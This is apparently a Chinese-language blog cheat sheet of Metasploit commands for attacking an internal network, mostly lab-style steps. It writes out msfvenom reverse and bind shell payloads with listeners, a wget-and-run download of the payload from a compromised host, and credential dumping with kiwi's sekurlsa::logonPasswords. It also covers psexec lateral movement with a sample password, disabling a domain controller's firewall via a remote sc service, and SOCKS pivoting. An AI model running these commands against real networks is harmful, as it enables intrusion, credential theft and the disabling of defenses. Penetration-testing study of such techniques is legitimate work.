msf内网主机存存活扫描
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.52.1-255
set threads 5
run
Metasploit 脚本Web传递攻击
use exploit/multi/script/web_delivery
show targets
set target 7 #Linux
show payloads
set payload 7 #linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.203
run
#复制去机器上运行
meterpreter添加路由
#meterpreter终端
run autoroute -s 192.168.52.0/24 #添加路由
run autoroute -p
background
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp lport=5555 -f elf -o shell.elf #生成木马
上传木马
sessions 1
upload /home/kali/shell.elf /tmp/shell.elf #上传木马
background
监听木马上线
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.203
set lport 5555
run
目标不出网,从同网段的肉鸡上下载木马
#192.168.52.10终端(肉鸡开始web服务)
python3 -m http.server
#192.168.52.20终端(shell,下载木马上线msf)
wget http://192.168.52.10:8000/shell.elf;chmod +x shell.elf;./shell.elf
内网读取hash
如果机器是x64系统(必须先注入x64的进程才能运行)
ps #找到x64的进程pid
migrate 1614 #注入到64位的程序
load kiwi #运行程序
kiwi_cmd privilege::debug #提升权限
kiwi_cmd sekurlsa::logonPasswords # 读取密码
-------------------------------------------------
meterpreter > creds_tspkg
meterpreter > kiwi_cmd -f sekurlsa::logonpasswords
注:自动迁移进程命令:run post/windows/manage/migrate
输入getpid查看当前PID,发现变为1416
进程迁移完后,原先PID为236的进行会自动关闭,如未关闭可以输入kill 236 杀掉进程
msf开启代理
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
run
代理运用
proxychains rdesktop 192.168.93.20
管理多个jobs
help
jobs
kill 6
内网打ms17_010(设置好正向或者反向payload是关键)
先用MSF生成dll文件
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=443 -f dll > x64.dll
将x64.dll放到工具目录替换原来的,MSF设置好监听
psexec登陆(假如抓到了密码)如果不成功可能是防火墙的原因
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run
控制第二层网络的Windows 7远程关闭域控的防火墙
控制第二层网络的Windows 7与域控建立ipc连接
meterpreter>shell
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
使用sc远程在域制器(192.168.93.30)上创建服务关闭防火墙
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall
再次尝试执行 exploit/windows/smb/psexec 模块登录
msf和cs联动
metasploit与Cobaltstrike互相派生shell
代理搭建(一)
1.png 2.png代理就使用浏览器的sock4代理,ip就是服务端的,端口是是我们刚刚自定义的
代理搭建(二)
3.png把代码复制到metasploit控制台中,将metasploit中的流量引入到此socks代理
4.pnglisten中继
在现有机器上使用中转
5.png 6.png生成木马
7.png
网友评论